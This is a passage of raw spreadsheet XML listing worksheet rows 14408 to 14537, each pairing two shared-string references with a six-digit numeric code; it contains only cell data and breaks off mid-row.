    <row r="14408" spans="1:3">
      <c r="A14408" s="28" t="s">
        <v>23346</v>
      </c>
      <c r="B14408" s="14" t="s">
        <v>12737</v>
      </c>
      <c r="C14408" s="15">
        <v>345275</v>
      </c>
    </row>
    <row r="14409" spans="1:3">
      <c r="A14409" s="28" t="s">
        <v>23348</v>
      </c>
      <c r="B14409" s="14" t="s">
        <v>12739</v>
      </c>
      <c r="C14409" s="15">
        <v>345282</v>
      </c>
    </row>
    <row r="14410" spans="1:3">
      <c r="A14410" s="28" t="s">
        <v>25117</v>
      </c>
      <c r="B14410" s="14" t="s">
        <v>14908</v>
      </c>
      <c r="C14410" s="15">
        <v>345800</v>
      </c>
    </row>
    <row r="14411" spans="1:3">
      <c r="A14411" s="28" t="s">
        <v>18919</v>
      </c>
      <c r="B14411" s="14" t="s">
        <v>7337</v>
      </c>
      <c r="C14411" s="15">
        <v>345898</v>
      </c>
    </row>
    <row r="14412" spans="1:3">
      <c r="A14412" s="28" t="s">
        <v>22093</v>
      </c>
      <c r="B14412" s="14" t="s">
        <v>12033</v>
      </c>
      <c r="C14412" s="15">
        <v>345899</v>
      </c>
    </row>
    <row r="14413" spans="1:3">
      <c r="A14413" s="28" t="s">
        <v>25118</v>
      </c>
      <c r="B14413" s="14" t="s">
        <v>14909</v>
      </c>
      <c r="C14413" s="15">
        <v>345903</v>
      </c>
    </row>
    <row r="14414" spans="1:3">
      <c r="A14414" s="28" t="s">
        <v>24924</v>
      </c>
      <c r="B14414" s="14" t="s">
        <v>14541</v>
      </c>
      <c r="C14414" s="15">
        <v>345910</v>
      </c>
    </row>
    <row r="14415" spans="1:3">
      <c r="A14415" s="28" t="s">
        <v>23349</v>
      </c>
      <c r="B14415" s="14" t="s">
        <v>14910</v>
      </c>
      <c r="C14415" s="15">
        <v>345950</v>
      </c>
    </row>
    <row r="14416" spans="1:3">
      <c r="A14416" s="28" t="s">
        <v>25119</v>
      </c>
      <c r="B14416" s="14" t="s">
        <v>14911</v>
      </c>
      <c r="C14416" s="15">
        <v>345951</v>
      </c>
    </row>
    <row r="14417" spans="1:3">
      <c r="A14417" s="28" t="s">
        <v>23351</v>
      </c>
      <c r="B14417" s="14" t="s">
        <v>11667</v>
      </c>
      <c r="C14417" s="15">
        <v>345952</v>
      </c>
    </row>
    <row r="14418" spans="1:3">
      <c r="A14418" s="28" t="s">
        <v>23350</v>
      </c>
      <c r="B14418" s="14" t="s">
        <v>12741</v>
      </c>
      <c r="C14418" s="15">
        <v>345953</v>
      </c>
    </row>
    <row r="14419" spans="1:3">
      <c r="A14419" s="28" t="s">
        <v>25120</v>
      </c>
      <c r="B14419" s="14" t="s">
        <v>14912</v>
      </c>
      <c r="C14419" s="15">
        <v>345954</v>
      </c>
    </row>
    <row r="14420" spans="1:3">
      <c r="A14420" s="28" t="s">
        <v>25121</v>
      </c>
      <c r="B14420" s="14" t="s">
        <v>14913</v>
      </c>
      <c r="C14420" s="15">
        <v>345955</v>
      </c>
    </row>
    <row r="14421" spans="1:3">
      <c r="A14421" s="28" t="s">
        <v>23351</v>
      </c>
      <c r="B14421" s="14" t="s">
        <v>14914</v>
      </c>
      <c r="C14421" s="15">
        <v>345956</v>
      </c>
    </row>
    <row r="14422" spans="1:3">
      <c r="A14422" s="28" t="s">
        <v>23352</v>
      </c>
      <c r="B14422" s="14" t="s">
        <v>12562</v>
      </c>
      <c r="C14422" s="15">
        <v>345957</v>
      </c>
    </row>
    <row r="14423" spans="1:3">
      <c r="A14423" s="28" t="s">
        <v>25122</v>
      </c>
      <c r="B14423" s="14" t="s">
        <v>14915</v>
      </c>
      <c r="C14423" s="15">
        <v>345959</v>
      </c>
    </row>
    <row r="14424" spans="1:3">
      <c r="A14424" s="28" t="s">
        <v>25123</v>
      </c>
      <c r="B14424" s="14" t="s">
        <v>14916</v>
      </c>
      <c r="C14424" s="15">
        <v>345960</v>
      </c>
    </row>
    <row r="14425" spans="1:3">
      <c r="A14425" s="28" t="s">
        <v>25124</v>
      </c>
      <c r="B14425" s="14" t="s">
        <v>14917</v>
      </c>
      <c r="C14425" s="15">
        <v>345961</v>
      </c>
    </row>
    <row r="14426" spans="1:3">
      <c r="A14426" s="28" t="s">
        <v>25125</v>
      </c>
      <c r="B14426" s="14" t="s">
        <v>14918</v>
      </c>
      <c r="C14426" s="15">
        <v>345962</v>
      </c>
    </row>
    <row r="14427" spans="1:3">
      <c r="A14427" s="28" t="s">
        <v>25126</v>
      </c>
      <c r="B14427" s="14" t="s">
        <v>14919</v>
      </c>
      <c r="C14427" s="15">
        <v>345963</v>
      </c>
    </row>
    <row r="14428" spans="1:3">
      <c r="A14428" s="28" t="s">
        <v>25127</v>
      </c>
      <c r="B14428" s="14" t="s">
        <v>14920</v>
      </c>
      <c r="C14428" s="15">
        <v>345970</v>
      </c>
    </row>
    <row r="14429" spans="1:3">
      <c r="A14429" s="28" t="s">
        <v>25127</v>
      </c>
      <c r="B14429" s="14" t="s">
        <v>14920</v>
      </c>
      <c r="C14429" s="15">
        <v>345971</v>
      </c>
    </row>
    <row r="14430" spans="1:3">
      <c r="A14430" s="28" t="s">
        <v>25128</v>
      </c>
      <c r="B14430" s="14" t="s">
        <v>14921</v>
      </c>
      <c r="C14430" s="15">
        <v>345972</v>
      </c>
    </row>
    <row r="14431" spans="1:3">
      <c r="A14431" s="28" t="s">
        <v>25129</v>
      </c>
      <c r="B14431" s="14" t="s">
        <v>14922</v>
      </c>
      <c r="C14431" s="15">
        <v>345975</v>
      </c>
    </row>
    <row r="14432" spans="1:3">
      <c r="A14432" s="28" t="s">
        <v>25130</v>
      </c>
      <c r="B14432" s="14" t="s">
        <v>14923</v>
      </c>
      <c r="C14432" s="15">
        <v>345980</v>
      </c>
    </row>
    <row r="14433" spans="1:3">
      <c r="A14433" s="28" t="s">
        <v>18949</v>
      </c>
      <c r="B14433" s="14" t="s">
        <v>7368</v>
      </c>
      <c r="C14433" s="15">
        <v>347010</v>
      </c>
    </row>
    <row r="14434" spans="1:3">
      <c r="A14434" s="28" t="s">
        <v>18949</v>
      </c>
      <c r="B14434" s="14" t="s">
        <v>7368</v>
      </c>
      <c r="C14434" s="15">
        <v>347020</v>
      </c>
    </row>
    <row r="14435" spans="1:3">
      <c r="A14435" s="28" t="s">
        <v>23355</v>
      </c>
      <c r="B14435" s="14" t="s">
        <v>12744</v>
      </c>
      <c r="C14435" s="15">
        <v>347052</v>
      </c>
    </row>
    <row r="14436" spans="1:3">
      <c r="A14436" s="28" t="s">
        <v>20047</v>
      </c>
      <c r="B14436" s="14" t="s">
        <v>9321</v>
      </c>
      <c r="C14436" s="15">
        <v>347232</v>
      </c>
    </row>
    <row r="14437" spans="1:3">
      <c r="A14437" s="28" t="s">
        <v>23357</v>
      </c>
      <c r="B14437" s="14" t="s">
        <v>12746</v>
      </c>
      <c r="C14437" s="15">
        <v>347280</v>
      </c>
    </row>
    <row r="14438" spans="1:3">
      <c r="A14438" s="28" t="s">
        <v>779</v>
      </c>
      <c r="B14438" s="14" t="s">
        <v>8550</v>
      </c>
      <c r="C14438" s="15">
        <v>347286</v>
      </c>
    </row>
    <row r="14439" spans="1:3">
      <c r="A14439" s="28" t="s">
        <v>23359</v>
      </c>
      <c r="B14439" s="14" t="s">
        <v>9292</v>
      </c>
      <c r="C14439" s="15">
        <v>347959</v>
      </c>
    </row>
    <row r="14440" spans="1:3">
      <c r="A14440" s="28" t="s">
        <v>23360</v>
      </c>
      <c r="B14440" s="14" t="s">
        <v>12748</v>
      </c>
      <c r="C14440" s="15">
        <v>347960</v>
      </c>
    </row>
    <row r="14441" spans="1:3">
      <c r="A14441" s="28" t="s">
        <v>21235</v>
      </c>
      <c r="B14441" s="14" t="s">
        <v>10342</v>
      </c>
      <c r="C14441" s="15">
        <v>347970</v>
      </c>
    </row>
    <row r="14442" spans="1:3">
      <c r="A14442" s="28" t="s">
        <v>148</v>
      </c>
      <c r="B14442" s="14" t="s">
        <v>9044</v>
      </c>
      <c r="C14442" s="15">
        <v>347971</v>
      </c>
    </row>
    <row r="14443" spans="1:3">
      <c r="A14443" s="28" t="s">
        <v>23361</v>
      </c>
      <c r="B14443" s="14" t="s">
        <v>12749</v>
      </c>
      <c r="C14443" s="15">
        <v>347975</v>
      </c>
    </row>
    <row r="14444" spans="1:3">
      <c r="A14444" s="28" t="s">
        <v>23362</v>
      </c>
      <c r="B14444" s="14" t="s">
        <v>12750</v>
      </c>
      <c r="C14444" s="15">
        <v>347980</v>
      </c>
    </row>
    <row r="14445" spans="1:3">
      <c r="A14445" s="28" t="s">
        <v>25131</v>
      </c>
      <c r="B14445" s="14" t="s">
        <v>14924</v>
      </c>
      <c r="C14445" s="15">
        <v>348950</v>
      </c>
    </row>
    <row r="14446" spans="1:3">
      <c r="A14446" s="28" t="s">
        <v>18952</v>
      </c>
      <c r="B14446" s="14" t="s">
        <v>7371</v>
      </c>
      <c r="C14446" s="15">
        <v>349020</v>
      </c>
    </row>
    <row r="14447" spans="1:3">
      <c r="A14447" s="28" t="s">
        <v>18926</v>
      </c>
      <c r="B14447" s="14" t="s">
        <v>7344</v>
      </c>
      <c r="C14447" s="15">
        <v>349030</v>
      </c>
    </row>
    <row r="14448" spans="1:3">
      <c r="A14448" s="28" t="s">
        <v>23364</v>
      </c>
      <c r="B14448" s="14" t="s">
        <v>12752</v>
      </c>
      <c r="C14448" s="15">
        <v>349035</v>
      </c>
    </row>
    <row r="14449" spans="1:3">
      <c r="A14449" s="28" t="s">
        <v>20680</v>
      </c>
      <c r="B14449" s="14" t="s">
        <v>10345</v>
      </c>
      <c r="C14449" s="15">
        <v>349037</v>
      </c>
    </row>
    <row r="14450" spans="1:3">
      <c r="A14450" s="28" t="s">
        <v>20339</v>
      </c>
      <c r="B14450" s="14" t="s">
        <v>9380</v>
      </c>
      <c r="C14450" s="15">
        <v>349170</v>
      </c>
    </row>
    <row r="14451" spans="1:3">
      <c r="A14451" s="28" t="s">
        <v>455</v>
      </c>
      <c r="B14451" s="14" t="s">
        <v>9438</v>
      </c>
      <c r="C14451" s="15">
        <v>349172</v>
      </c>
    </row>
    <row r="14452" spans="1:3">
      <c r="A14452" s="28" t="s">
        <v>1043</v>
      </c>
      <c r="B14452" s="14" t="s">
        <v>8985</v>
      </c>
      <c r="C14452" s="15">
        <v>349252</v>
      </c>
    </row>
    <row r="14453" spans="1:3">
      <c r="A14453" s="28" t="s">
        <v>293</v>
      </c>
      <c r="B14453" s="14" t="s">
        <v>9270</v>
      </c>
      <c r="C14453" s="15">
        <v>349253</v>
      </c>
    </row>
    <row r="14454" spans="1:3">
      <c r="A14454" s="28" t="s">
        <v>164</v>
      </c>
      <c r="B14454" s="14" t="s">
        <v>9495</v>
      </c>
      <c r="C14454" s="15">
        <v>349254</v>
      </c>
    </row>
    <row r="14455" spans="1:3">
      <c r="A14455" s="28" t="s">
        <v>80</v>
      </c>
      <c r="B14455" s="14" t="s">
        <v>12575</v>
      </c>
      <c r="C14455" s="15">
        <v>349264</v>
      </c>
    </row>
    <row r="14456" spans="1:3">
      <c r="A14456" s="28" t="s">
        <v>779</v>
      </c>
      <c r="B14456" s="14" t="s">
        <v>8550</v>
      </c>
      <c r="C14456" s="15">
        <v>349265</v>
      </c>
    </row>
    <row r="14457" spans="1:3">
      <c r="A14457" s="28" t="s">
        <v>119</v>
      </c>
      <c r="B14457" s="14" t="s">
        <v>8971</v>
      </c>
      <c r="C14457" s="15">
        <v>349266</v>
      </c>
    </row>
    <row r="14458" spans="1:3">
      <c r="A14458" s="28" t="s">
        <v>23365</v>
      </c>
      <c r="B14458" s="14" t="s">
        <v>14925</v>
      </c>
      <c r="C14458" s="15">
        <v>350000</v>
      </c>
    </row>
    <row r="14459" spans="1:3">
      <c r="A14459" s="28" t="s">
        <v>25132</v>
      </c>
      <c r="B14459" s="14" t="s">
        <v>14926</v>
      </c>
      <c r="C14459" s="15">
        <v>350004</v>
      </c>
    </row>
    <row r="14460" spans="1:3">
      <c r="A14460" s="28" t="s">
        <v>25133</v>
      </c>
      <c r="B14460" s="14" t="s">
        <v>14927</v>
      </c>
      <c r="C14460" s="15">
        <v>350020</v>
      </c>
    </row>
    <row r="14461" spans="1:3">
      <c r="A14461" s="28" t="s">
        <v>25134</v>
      </c>
      <c r="B14461" s="14" t="s">
        <v>14928</v>
      </c>
      <c r="C14461" s="15">
        <v>350021</v>
      </c>
    </row>
    <row r="14462" spans="1:3">
      <c r="A14462" s="28" t="s">
        <v>25135</v>
      </c>
      <c r="B14462" s="14" t="s">
        <v>14929</v>
      </c>
      <c r="C14462" s="15">
        <v>350022</v>
      </c>
    </row>
    <row r="14463" spans="1:3">
      <c r="A14463" s="28" t="s">
        <v>25136</v>
      </c>
      <c r="B14463" s="14" t="s">
        <v>14930</v>
      </c>
      <c r="C14463" s="15">
        <v>350023</v>
      </c>
    </row>
    <row r="14464" spans="1:3">
      <c r="A14464" s="28" t="s">
        <v>25137</v>
      </c>
      <c r="B14464" s="14" t="s">
        <v>14931</v>
      </c>
      <c r="C14464" s="15">
        <v>350024</v>
      </c>
    </row>
    <row r="14465" spans="1:3">
      <c r="A14465" s="28" t="s">
        <v>25138</v>
      </c>
      <c r="B14465" s="14" t="s">
        <v>14932</v>
      </c>
      <c r="C14465" s="15">
        <v>350026</v>
      </c>
    </row>
    <row r="14466" spans="1:3">
      <c r="A14466" s="28" t="s">
        <v>23366</v>
      </c>
      <c r="B14466" s="14" t="s">
        <v>12754</v>
      </c>
      <c r="C14466" s="15">
        <v>350029</v>
      </c>
    </row>
    <row r="14467" spans="1:3">
      <c r="A14467" s="28" t="s">
        <v>23367</v>
      </c>
      <c r="B14467" s="14" t="s">
        <v>12755</v>
      </c>
      <c r="C14467" s="15">
        <v>350032</v>
      </c>
    </row>
    <row r="14468" spans="1:3">
      <c r="A14468" s="28" t="s">
        <v>25139</v>
      </c>
      <c r="B14468" s="14" t="s">
        <v>14933</v>
      </c>
      <c r="C14468" s="15">
        <v>350034</v>
      </c>
    </row>
    <row r="14469" spans="1:3">
      <c r="A14469" s="28" t="s">
        <v>25140</v>
      </c>
      <c r="B14469" s="14" t="s">
        <v>14934</v>
      </c>
      <c r="C14469" s="15">
        <v>350035</v>
      </c>
    </row>
    <row r="14470" spans="1:3">
      <c r="A14470" s="28" t="s">
        <v>25141</v>
      </c>
      <c r="B14470" s="14" t="s">
        <v>14935</v>
      </c>
      <c r="C14470" s="15">
        <v>350036</v>
      </c>
    </row>
    <row r="14471" spans="1:3">
      <c r="A14471" s="28" t="s">
        <v>25142</v>
      </c>
      <c r="B14471" s="14" t="s">
        <v>14936</v>
      </c>
      <c r="C14471" s="15">
        <v>350038</v>
      </c>
    </row>
    <row r="14472" spans="1:3">
      <c r="A14472" s="28" t="s">
        <v>23370</v>
      </c>
      <c r="B14472" s="14" t="s">
        <v>12758</v>
      </c>
      <c r="C14472" s="15">
        <v>350039</v>
      </c>
    </row>
    <row r="14473" spans="1:3">
      <c r="A14473" s="28" t="s">
        <v>25143</v>
      </c>
      <c r="B14473" s="14" t="s">
        <v>14937</v>
      </c>
      <c r="C14473" s="15">
        <v>350040</v>
      </c>
    </row>
    <row r="14474" spans="1:3">
      <c r="A14474" s="28" t="s">
        <v>25144</v>
      </c>
      <c r="B14474" s="14" t="s">
        <v>14938</v>
      </c>
      <c r="C14474" s="15">
        <v>350041</v>
      </c>
    </row>
    <row r="14475" spans="1:3">
      <c r="A14475" s="28" t="s">
        <v>25145</v>
      </c>
      <c r="B14475" s="14" t="s">
        <v>14939</v>
      </c>
      <c r="C14475" s="15">
        <v>350043</v>
      </c>
    </row>
    <row r="14476" spans="1:3">
      <c r="A14476" s="28" t="s">
        <v>25146</v>
      </c>
      <c r="B14476" s="14" t="s">
        <v>14940</v>
      </c>
      <c r="C14476" s="15">
        <v>350044</v>
      </c>
    </row>
    <row r="14477" spans="1:3">
      <c r="A14477" s="28" t="s">
        <v>25147</v>
      </c>
      <c r="B14477" s="14" t="s">
        <v>14941</v>
      </c>
      <c r="C14477" s="15">
        <v>350045</v>
      </c>
    </row>
    <row r="14478" spans="1:3">
      <c r="A14478" s="28" t="s">
        <v>25148</v>
      </c>
      <c r="B14478" s="14" t="s">
        <v>14942</v>
      </c>
      <c r="C14478" s="15">
        <v>350099</v>
      </c>
    </row>
    <row r="14479" spans="1:3">
      <c r="A14479" s="28" t="s">
        <v>25149</v>
      </c>
      <c r="B14479" s="14" t="s">
        <v>14943</v>
      </c>
      <c r="C14479" s="15">
        <v>350103</v>
      </c>
    </row>
    <row r="14480" spans="1:3">
      <c r="A14480" s="28" t="s">
        <v>25150</v>
      </c>
      <c r="B14480" s="14" t="s">
        <v>14944</v>
      </c>
      <c r="C14480" s="15">
        <v>350110</v>
      </c>
    </row>
    <row r="14481" spans="1:3">
      <c r="A14481" s="28" t="s">
        <v>23372</v>
      </c>
      <c r="B14481" s="14" t="s">
        <v>12760</v>
      </c>
      <c r="C14481" s="15">
        <v>350201</v>
      </c>
    </row>
    <row r="14482" spans="1:3">
      <c r="A14482" s="28" t="s">
        <v>25151</v>
      </c>
      <c r="B14482" s="14" t="s">
        <v>14945</v>
      </c>
      <c r="C14482" s="15">
        <v>350320</v>
      </c>
    </row>
    <row r="14483" spans="1:3">
      <c r="A14483" s="28" t="s">
        <v>23381</v>
      </c>
      <c r="B14483" s="14" t="s">
        <v>10464</v>
      </c>
      <c r="C14483" s="15">
        <v>350400</v>
      </c>
    </row>
    <row r="14484" spans="1:3">
      <c r="A14484" s="28" t="s">
        <v>23382</v>
      </c>
      <c r="B14484" s="14" t="s">
        <v>12769</v>
      </c>
      <c r="C14484" s="15">
        <v>350405</v>
      </c>
    </row>
    <row r="14485" spans="1:3">
      <c r="A14485" s="28" t="s">
        <v>25152</v>
      </c>
      <c r="B14485" s="14" t="s">
        <v>14946</v>
      </c>
      <c r="C14485" s="15">
        <v>350412</v>
      </c>
    </row>
    <row r="14486" spans="1:3">
      <c r="A14486" s="28" t="s">
        <v>23384</v>
      </c>
      <c r="B14486" s="14" t="s">
        <v>14947</v>
      </c>
      <c r="C14486" s="15">
        <v>350421</v>
      </c>
    </row>
    <row r="14487" spans="1:3">
      <c r="A14487" s="28" t="s">
        <v>23386</v>
      </c>
      <c r="B14487" s="14" t="s">
        <v>14948</v>
      </c>
      <c r="C14487" s="15">
        <v>350440</v>
      </c>
    </row>
    <row r="14488" spans="1:3">
      <c r="A14488" s="28" t="s">
        <v>18953</v>
      </c>
      <c r="B14488" s="14" t="s">
        <v>7372</v>
      </c>
      <c r="C14488" s="15">
        <v>350450</v>
      </c>
    </row>
    <row r="14489" spans="1:3">
      <c r="A14489" s="28" t="s">
        <v>18954</v>
      </c>
      <c r="B14489" s="14" t="s">
        <v>7372</v>
      </c>
      <c r="C14489" s="15">
        <v>350451</v>
      </c>
    </row>
    <row r="14490" spans="1:3">
      <c r="A14490" s="28" t="s">
        <v>23387</v>
      </c>
      <c r="B14490" s="14" t="s">
        <v>12774</v>
      </c>
      <c r="C14490" s="15">
        <v>350491</v>
      </c>
    </row>
    <row r="14491" spans="1:3">
      <c r="A14491" s="28" t="s">
        <v>18955</v>
      </c>
      <c r="B14491" s="14" t="s">
        <v>14949</v>
      </c>
      <c r="C14491" s="15">
        <v>350500</v>
      </c>
    </row>
    <row r="14492" spans="1:3">
      <c r="A14492" s="28" t="s">
        <v>23388</v>
      </c>
      <c r="B14492" s="14" t="s">
        <v>14950</v>
      </c>
      <c r="C14492" s="15">
        <v>350501</v>
      </c>
    </row>
    <row r="14493" spans="1:3">
      <c r="A14493" s="28" t="s">
        <v>23389</v>
      </c>
      <c r="B14493" s="14" t="s">
        <v>12775</v>
      </c>
      <c r="C14493" s="15">
        <v>350601</v>
      </c>
    </row>
    <row r="14494" spans="1:3">
      <c r="A14494" s="28" t="s">
        <v>23391</v>
      </c>
      <c r="B14494" s="14" t="s">
        <v>12777</v>
      </c>
      <c r="C14494" s="15">
        <v>350631</v>
      </c>
    </row>
    <row r="14495" spans="1:3">
      <c r="A14495" s="28" t="s">
        <v>23392</v>
      </c>
      <c r="B14495" s="14" t="s">
        <v>12778</v>
      </c>
      <c r="C14495" s="15">
        <v>350637</v>
      </c>
    </row>
    <row r="14496" spans="1:3">
      <c r="A14496" s="28" t="s">
        <v>23394</v>
      </c>
      <c r="B14496" s="14" t="s">
        <v>12780</v>
      </c>
      <c r="C14496" s="15">
        <v>353700</v>
      </c>
    </row>
    <row r="14497" spans="1:3">
      <c r="A14497" s="28" t="s">
        <v>25153</v>
      </c>
      <c r="B14497" s="14" t="s">
        <v>12780</v>
      </c>
      <c r="C14497" s="15">
        <v>353950</v>
      </c>
    </row>
    <row r="14498" spans="1:3">
      <c r="A14498" s="28" t="s">
        <v>25154</v>
      </c>
      <c r="B14498" s="14" t="s">
        <v>14951</v>
      </c>
      <c r="C14498" s="15">
        <v>353951</v>
      </c>
    </row>
    <row r="14499" spans="1:3">
      <c r="A14499" s="28" t="s">
        <v>23395</v>
      </c>
      <c r="B14499" s="14" t="s">
        <v>12781</v>
      </c>
      <c r="C14499" s="15">
        <v>353952</v>
      </c>
    </row>
    <row r="14500" spans="1:3">
      <c r="A14500" s="28" t="s">
        <v>23396</v>
      </c>
      <c r="B14500" s="14" t="s">
        <v>9612</v>
      </c>
      <c r="C14500" s="15">
        <v>353954</v>
      </c>
    </row>
    <row r="14501" spans="1:3">
      <c r="A14501" s="28" t="s">
        <v>21239</v>
      </c>
      <c r="B14501" s="14" t="s">
        <v>10348</v>
      </c>
      <c r="C14501" s="15">
        <v>354010</v>
      </c>
    </row>
    <row r="14502" spans="1:3">
      <c r="A14502" s="28" t="s">
        <v>21240</v>
      </c>
      <c r="B14502" s="14" t="s">
        <v>10349</v>
      </c>
      <c r="C14502" s="15">
        <v>354012</v>
      </c>
    </row>
    <row r="14503" spans="1:3">
      <c r="A14503" s="28" t="s">
        <v>21241</v>
      </c>
      <c r="B14503" s="14" t="s">
        <v>10350</v>
      </c>
      <c r="C14503" s="15">
        <v>354018</v>
      </c>
    </row>
    <row r="14504" spans="1:3">
      <c r="A14504" s="28" t="s">
        <v>21242</v>
      </c>
      <c r="B14504" s="14" t="s">
        <v>10351</v>
      </c>
      <c r="C14504" s="15">
        <v>354019</v>
      </c>
    </row>
    <row r="14505" spans="1:3">
      <c r="A14505" s="28" t="s">
        <v>164</v>
      </c>
      <c r="B14505" s="14" t="s">
        <v>14952</v>
      </c>
      <c r="C14505" s="15">
        <v>354020</v>
      </c>
    </row>
    <row r="14506" spans="1:3">
      <c r="A14506" s="28" t="s">
        <v>20568</v>
      </c>
      <c r="B14506" s="14" t="s">
        <v>10845</v>
      </c>
      <c r="C14506" s="15">
        <v>354021</v>
      </c>
    </row>
    <row r="14507" spans="1:3">
      <c r="A14507" s="28" t="s">
        <v>81</v>
      </c>
      <c r="B14507" s="14" t="s">
        <v>8683</v>
      </c>
      <c r="C14507" s="15">
        <v>354022</v>
      </c>
    </row>
    <row r="14508" spans="1:3">
      <c r="A14508" s="28" t="s">
        <v>21243</v>
      </c>
      <c r="B14508" s="14" t="s">
        <v>8548</v>
      </c>
      <c r="C14508" s="15">
        <v>354023</v>
      </c>
    </row>
    <row r="14509" spans="1:3">
      <c r="A14509" s="28" t="s">
        <v>23398</v>
      </c>
      <c r="B14509" s="14" t="s">
        <v>12783</v>
      </c>
      <c r="C14509" s="15">
        <v>354033</v>
      </c>
    </row>
    <row r="14510" spans="1:3">
      <c r="A14510" s="28" t="s">
        <v>23399</v>
      </c>
      <c r="B14510" s="14" t="s">
        <v>12784</v>
      </c>
      <c r="C14510" s="15">
        <v>354040</v>
      </c>
    </row>
    <row r="14511" spans="1:3">
      <c r="A14511" s="28" t="s">
        <v>119</v>
      </c>
      <c r="B14511" s="14" t="s">
        <v>10048</v>
      </c>
      <c r="C14511" s="15">
        <v>354042</v>
      </c>
    </row>
    <row r="14512" spans="1:3">
      <c r="A14512" s="28" t="s">
        <v>18918</v>
      </c>
      <c r="B14512" s="14" t="s">
        <v>7336</v>
      </c>
      <c r="C14512" s="15">
        <v>354043</v>
      </c>
    </row>
    <row r="14513" spans="1:3">
      <c r="A14513" s="28" t="s">
        <v>20671</v>
      </c>
      <c r="B14513" s="14" t="s">
        <v>7688</v>
      </c>
      <c r="C14513" s="15">
        <v>354044</v>
      </c>
    </row>
    <row r="14514" spans="1:3">
      <c r="A14514" s="28" t="s">
        <v>119</v>
      </c>
      <c r="B14514" s="14" t="s">
        <v>10048</v>
      </c>
      <c r="C14514" s="15">
        <v>354046</v>
      </c>
    </row>
    <row r="14515" spans="1:3">
      <c r="A14515" s="28" t="s">
        <v>25155</v>
      </c>
      <c r="B14515" s="14" t="s">
        <v>14953</v>
      </c>
      <c r="C14515" s="15">
        <v>354050</v>
      </c>
    </row>
    <row r="14516" spans="1:3">
      <c r="A14516" s="28" t="s">
        <v>23400</v>
      </c>
      <c r="B14516" s="14" t="s">
        <v>14954</v>
      </c>
      <c r="C14516" s="15">
        <v>354070</v>
      </c>
    </row>
    <row r="14517" spans="1:3">
      <c r="A14517" s="28" t="s">
        <v>21246</v>
      </c>
      <c r="B14517" s="14" t="s">
        <v>10356</v>
      </c>
      <c r="C14517" s="15">
        <v>354072</v>
      </c>
    </row>
    <row r="14518" spans="1:3">
      <c r="A14518" s="28" t="s">
        <v>23401</v>
      </c>
      <c r="B14518" s="14" t="s">
        <v>9607</v>
      </c>
      <c r="C14518" s="15">
        <v>354073</v>
      </c>
    </row>
    <row r="14519" spans="1:3">
      <c r="A14519" s="28" t="s">
        <v>769</v>
      </c>
      <c r="B14519" s="14" t="s">
        <v>12787</v>
      </c>
      <c r="C14519" s="15">
        <v>354080</v>
      </c>
    </row>
    <row r="14520" spans="1:3">
      <c r="A14520" s="28" t="s">
        <v>23403</v>
      </c>
      <c r="B14520" s="14" t="s">
        <v>9811</v>
      </c>
      <c r="C14520" s="15">
        <v>355002</v>
      </c>
    </row>
    <row r="14521" spans="1:3">
      <c r="A14521" s="28" t="s">
        <v>23404</v>
      </c>
      <c r="B14521" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C14521" s="15">
        <v>355010</v>
      </c>
    </row>
    <row r="14522" spans="1:3">
      <c r="A14522" s="28" t="s">
        <v>23404</v>
      </c>
      <c r="B14522" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C14522" s="15">
        <v>355011</v>
      </c>
    </row>
    <row r="14523" spans="1:3">
      <c r="A14523" s="28" t="s">
        <v>19738</v>
      </c>
      <c r="B14523" s="14" t="s">
        <v>8697</v>
      </c>
      <c r="C14523" s="15">
        <v>355012</v>
      </c>
    </row>
    <row r="14524" spans="1:3">
      <c r="A14524" s="28" t="s">
        <v>23405</v>
      </c>
      <c r="B14524" s="14" t="s">
        <v>12790</v>
      </c>
      <c r="C14524" s="15">
        <v>355013</v>
      </c>
    </row>
    <row r="14525" spans="1:3">
      <c r="A14525" s="28" t="s">
        <v>25156</v>
      </c>
      <c r="B14525" s="14" t="s">
        <v>14955</v>
      </c>
      <c r="C14525" s="15">
        <v>355014</v>
      </c>
    </row>
    <row r="14526" spans="1:3">
      <c r="A14526" s="28" t="s">
        <v>23406</v>
      </c>
      <c r="B14526" s="14" t="s">
        <v>12791</v>
      </c>
      <c r="C14526" s="15">
        <v>355017</v>
      </c>
    </row>
    <row r="14527" spans="1:3">
      <c r="A14527" s="28" t="s">
        <v>21686</v>
      </c>
      <c r="B14527" s="14" t="s">
        <v>8427</v>
      </c>
      <c r="C14527" s="15">
        <v>355020</v>
      </c>
    </row>
    <row r="14528" spans="1:3">
      <c r="A14528" s="28" t="s">
        <v>19738</v>
      </c>
      <c r="B14528" s="14" t="s">
        <v>9811</v>
      </c>
      <c r="C14528" s="15">
        <v>355021</v>
      </c>
    </row>
    <row r="14529" spans="1:3">
      <c r="A14529" s="28" t="s">
        <v>21896</v>
      </c>
      <c r="B14529" s="14" t="s">
        <v>10400</v>
      </c>
      <c r="C14529" s="15">
        <v>355022</v>
      </c>
    </row>
    <row r="14530" spans="1:3">
      <c r="A14530" s="28" t="s">
        <v>23407</v>
      </c>
      <c r="B14530" s="14" t="s">
        <v>12792</v>
      </c>
      <c r="C14530" s="15">
        <v>355030</v>
      </c>
    </row>
    <row r="14531" spans="1:3">
      <c r="A14531" s="28" t="s">
        <v>18956</v>
      </c>
      <c r="B14531" s="14" t="s">
        <v>7374</v>
      </c>
      <c r="C14531" s="15">
        <v>355031</v>
      </c>
    </row>
    <row r="14532" spans="1:3">
      <c r="A14532" s="28" t="s">
        <v>164</v>
      </c>
      <c r="B14532" s="14" t="s">
        <v>9495</v>
      </c>
      <c r="C14532" s="15">
        <v>355050</v>
      </c>
    </row>
    <row r="14533" spans="1:3">
      <c r="A14533" s="28" t="s">
        <v>19716</v>
      </c>
      <c r="B14533" s="14" t="s">
        <v>8669</v>
      </c>
      <c r="C14533" s="15">
        <v>355051</v>
      </c>
    </row>
    <row r="14534" spans="1:3">
      <c r="A14534" s="28" t="s">
        <v>19873</v>
      </c>
      <c r="B14534" s="14" t="s">
        <v>7750</v>
      </c>
      <c r="C14534" s="15">
        <v>355052</v>
      </c>
    </row>
    <row r="14535" spans="1:3">
      <c r="A14535" s="28" t="s">
        <v>1043</v>
      </c>
      <c r="B14535" s="14" t="s">
        <v>8985</v>
      </c>
      <c r="C14535" s="15">
        <v>355053</v>
      </c>
    </row>
    <row r="14536" spans="1:3">
      <c r="A14536" s="28" t="s">
        <v>20717</v>
      </c>
      <c r="B14536" s="14" t="s">
        <v>8945</v>
      </c>
      <c r="C14536" s="15">
        <v>355060</v>
      </c>
    </row>
    <row r="14537" spans="1:3">
      <c r="A14537" s="28" t="s">
        <v>19928</v>
      </c>
